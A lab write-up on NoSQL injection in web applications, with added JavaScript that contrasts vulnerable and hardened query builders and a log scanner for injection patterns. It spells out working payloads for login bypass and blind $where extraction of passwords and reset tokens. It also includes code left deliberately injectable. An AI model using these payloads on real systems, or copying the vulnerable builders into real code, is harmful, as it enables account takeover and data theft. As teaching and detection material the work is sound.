Detecting NoSQL injection
Probing for injection points shows that the category parameter is injectable:
?category=Lifestyle'%20%26%26%201%20%26%26%20'x
A tautology (always-true condition) then retrieves the hidden content:
?category=Lifestyle%27%20%7C%7C%201%20%7C%7C%20%27x

Exploiting NoSQL operator injection to bypass authentication
To solve the lab, log into the application as the administrator user.
You can log in to your own account using the following credentials: wiener:peter.
At login, the username and password parameters turn out to be injectable:
{"username":{"$regex":"w.*"},"password":"peter"}

{"username":{"$regex":"ad.*"},"password":{"$ne":""}}

Then capture the session cookie and id from the response, replay the request, and the privilege escalation succeeds.
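Why the two login payloads above work, and the input check that stops them, as an added example (this is not the lab's code). The users collection is an in-memory stand-in with constructed sample data, and the function names are my own; the filter builders and the operator evaluator only model the subset of MongoDB semantics needed here ($ne, $regex, string equality).

```javascript
// Added example, not code from the lab: operator injection in a JSON login body.

// Vulnerable pattern: the parsed JSON body goes straight into the filter, so an
// object value such as {"$ne": ""} is treated as a query operator by the driver.
function buildLoginFilterVulnerable(body) {
  return { username: body.username, password: body.password };
}

// Hardened pattern: credentials must be plain strings. An object, array or number
// is rejected before it can reach the database layer.
function buildLoginFilterSafe(body) {
  const { username, password } = body;
  if (typeof username !== "string" || typeof password !== "string") {
    throw new TypeError("username and password must be strings");
  }
  return { username, password };
}

// Constructed sample data standing in for the users collection (not the lab's accounts).
const USERS = [
  { username: "wiener", password: "peter" },
  { username: "administrator", password: "constructed-admin-pw" },
];

// Models how MongoDB evaluates one field of a filter: plain value => equality,
// {$ne: v} => inequality, {$regex: p} => regular-expression match.
function matchesField(actual, expected) {
  if (typeof expected !== "object" || expected === null) return actual === expected;
  if ("$ne" in expected) return actual !== expected.$ne;
  if ("$regex" in expected) return new RegExp(expected.$regex).test(actual);
  return false;
}

// Stand-in for collection.findOne(filter) over the in-memory USERS array.
function findOne(filter) {
  return USERS.find((u) => Object.keys(filter).every((k) => matchesField(u[k], filter[k]))) || null;
}

// Returns the username that the given filter builder would log in, or null.
// A rejected body (TypeError from the hardened builder) is simply a failed login.
function login(body, buildFilter) {
  try {
    const user = findOne(buildFilter(body));
    return user ? user.username : null;
  } catch (e) {
    return null;
  }
}

if (typeof require !== "undefined" && require.main === module) {
  const probe = { username: { $regex: "ad.*" }, password: { $ne: "" } };
  console.log("vulnerable:", login(probe, buildLoginFilterVulnerable)); // administrator
  console.log("hardened:  ", login(probe, buildLoginFilterSafe));       // null
}
```

The type check is the whole fix: with body parsing that accepts arbitrary JSON, the difference between a credential and an operator is only whether the value is a string, so that is what the server must enforce (a schema validator on the request body achieves the same thing).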

Exploiting NoSQL operator injection to extract unknown fields
To solve the lab, log in as carlos
Logging in with "$ne":"" now returns "account locked", but adding a $where clause gives the same response, which shows that the $where injection is being evaluated:
{"username":"carlos","password":{"$ne":""},"$where":"1"}
So use blind injection to recover the field names:
"$where":"Object.keys(this)[0].match('^.{0}a.*')"
this refers to the current document; Object.keys(this) collects all of the document's keys (field names) into an array.
^.{0} sets the position in the field name at which matching starts; the character that follows it is matched at that position.
We use Burp Intruder's cluster bomb attack to run the blind injection.
Five fields can be found: _id, username, password, email, resetToken.
Blind-injecting the password field eventually yields the administrator's password: lombn6ea8dv30mk0tgv6
{"username":"carlos","password":{"$ne":""},"$where":"this.password.match('^.{0}a.*')"}
But logging in with that password reports that the user is locked.
We switch approach: click "Forgot password", then pass ?resetToken=invalid as a GET parameter.
The response says "invalid token", which shows the resetToken parameter is honoured by the server.
We continue the blind injection to brute-force the value of the resetToken field: e8fa8f4c41d7881e
Requesting forgot-password with ?resetToken=e8fa8f4c41d7881e redirects to the password reset page. After resetting, we can log in as carlos.
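A detection-side view of the three labs so far (the category probe, the operator objects in the login body, and the $where field enumeration), as an added example that is not part of the original write-up: a scanner that walks request-log entries and flags MongoDB operator keys inside JSON bodies and JavaScript-looking fragments inside parameters. The log entries are constructed to mirror the request shapes above, not captured traffic, and the entry format ({method, url, body}) and all function names are assumptions of this example.

```javascript
// Added example, not code from the lab: flag NoSQL-injection shapes in request logs.

// Fragments that a legitimate category name or username should never contain.
const JS_FRAGMENTS = [
  { name: "this-reference", re: /\bthis\./ },
  { name: "match-call", re: /\.match\(/ },
  { name: "object-keys", re: /Object\.keys\(/ },
  { name: "quote-then-boolean-op", re: /'\s*(&&|\|\|)\s*/ },
];

// Collects every key beginning with "$" (a MongoDB operator) from parsed JSON,
// as dotted paths such as "password.$ne" or "$where".
function operatorKeys(value, path = "", out = []) {
  if (Array.isArray(value)) {
    value.forEach((v, i) => operatorKeys(v, `${path}[${i}]`, out));
  } else if (value && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      const p = path ? `${path}.${k}` : k;
      if (k.startsWith("$")) out.push(p);
      operatorKeys(v, p, out);
    }
  }
  return out;
}

// Collects every string leaf from parsed JSON so values can be pattern-checked.
function stringValues(value, out = []) {
  if (typeof value === "string") out.push(value);
  else if (Array.isArray(value)) value.forEach((v) => stringValues(v, out));
  else if (value && typeof value === "object") Object.values(value).forEach((v) => stringValues(v, out));
  return out;
}

// Names of the JS_FRAGMENTS patterns that match the given text.
function jsFragments(text) {
  return JS_FRAGMENTS.filter(({ re }) => re.test(text)).map(({ name }) => name);
}

// URL-decodes a query value; malformed percent-escapes are returned unchanged.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, " ")); } catch (e) { return s; }
}

// entry = { method, url, body }. Returns a list of { where, kind, detail } findings.
function scanRequest(entry) {
  const findings = [];
  const qs = entry.url.includes("?") ? entry.url.slice(entry.url.indexOf("?") + 1) : "";
  for (const part of qs.split("&").filter(Boolean)) {
    const i = part.indexOf("=");
    const k = i < 0 ? part : part.slice(0, i);
    const v = i < 0 ? "" : part.slice(i + 1);
    for (const name of jsFragments(safeDecode(v))) {
      findings.push({ where: `query:${k}`, kind: "js-fragment", detail: name });
    }
  }
  if (entry.body) {
    let parsed = null;
    try { parsed = JSON.parse(entry.body); } catch (e) { /* not JSON: skip body checks */ }
    if (parsed !== null) {
      for (const p of operatorKeys(parsed)) {
        findings.push({ where: `body:${p}`, kind: "operator", detail: p.split(".").pop() });
      }
      for (const s of stringValues(parsed)) {
        for (const name of jsFragments(s)) findings.push({ where: "body", kind: "js-fragment", detail: name });
      }
    }
  }
  return findings;
}

// Constructed sample log (request shapes from the labs above; not real captured traffic).
const SAMPLE_LOG = [
  { method: "GET", url: "/filter?category=Lifestyle%27%20%7C%7C%201%20%7C%7C%20%27x", body: "" },
  { method: "POST", url: "/login", body: '{"username":{"$regex":"ad.*"},"password":{"$ne":""}}' },
  { method: "POST", url: "/login", body: '{"username":"carlos","password":{"$ne":""},"$where":"this.password.match(\'^.{0}a.*\')"}' },
  { method: "GET", url: "/user/lookup?user=wiener", body: "" },
  { method: "POST", url: "/user/lookup", body: '{"username":"administrator\' && this.password.length < 30 || \'a\'==\'b"}' },
];

// Scans a whole log; one result object per entry.
function scanLog(entries) {
  return entries.map((e) => ({ url: e.url, findings: scanRequest(e) }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of scanLog(SAMPLE_LOG)) console.log(r.url, r.findings.length ? r.findings : "clean");
}
```

The operator-key check is the high-confidence signal: a JSON credential body has no business containing any key that starts with "$", so a single hit is worth an alert. The fragment patterns are noisier (a legitimate comment field could contain "this.") and are better used to rank, not block.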

Exploiting NoSQL injection to extract data
To solve the lab, extract the password for the administrator user, then log in to their account.
Passing wiener' && '1'=='1 to /user/lookup?user returns the same result as passing wiener, which shows conditional behaviour:
{"username":"wiener' && '1'=='1"}
Sending
administrator' && this.password.length < 30 || 'a'=='b
returns administrator's details, so the password is shorter than 30 characters; from there, brute-force the length with Intruder.
The password length turns out to be 8.
Then, with
administrator' && this.password.match(/^.{0}a.*/) || 'a'=='b
blind-injection brute force recovers the password: auuitexq
Log in as administrator to finish.
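The lookup lab differs from the login lab: the bug is string concatenation into a $where JavaScript expression, which is why a single quote breaks out and why the injected condition can make two different inputs return the same record. As an added example (not the lab's code), the vulnerable and hardened query builders below, with a small stand-in for the server-side $where evaluation run against a constructed document; the builder names, the document and the evaluator are all assumptions of this example.

```javascript
// Added example, not code from the lab: concatenation into $where versus a plain filter.

// Vulnerable: user input is spliced into JavaScript that the database will evaluate.
function buildLookupVulnerable(user) {
  return { $where: `this.username == '${user}'` };
}

// Hardened: the input is a query value, never code. A quote is just a character,
// and the type check keeps operator objects out as well.
function buildLookupSafe(user) {
  if (typeof user !== "string") throw new TypeError("user must be a string");
  return { username: user };
}

// Stand-in for how the server evaluates a filter against one document, so the
// example runs offline. new Function is used only to model $where on a constructed
// document; it is the very behaviour the hardened builder avoids.
function evaluateFilter(filter, doc) {
  if ("$where" in filter) {
    return Boolean(new Function(`return (${filter.$where});`).call(doc));
  }
  return Object.keys(filter).every((k) => doc[k] === filter[k]);
}

// Constructed document (not the lab's real record); password is 11 characters long.
const ADMIN_DOC = { username: "administrator", password: "constructed" };

// True if the given builder would return the administrator record for this input.
// A TypeError from the hardened builder counts as "no record".
function lookupReturnsAdmin(input, builder) {
  try { return evaluateFilter(builder(input), ADMIN_DOC); } catch (e) { return false; }
}

if (typeof require !== "undefined" && require.main === module) {
  const probe = "administrator' && this.password.length < 30 || 'a'=='b";
  console.log("vulnerable:", lookupReturnsAdmin(probe, buildLookupVulnerable)); // true
  console.log("hardened:  ", lookupReturnsAdmin(probe, buildLookupSafe));       // false
}
```

With the safe builder the probe string is compared literally against the username field, so the length condition is never evaluated and the response no longer leaks anything about the password. Disabling server-side JavaScript on the database (MongoDB's javascriptEnabled option) removes the $where sink entirely and is the stronger mitigation when the application does not need it.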
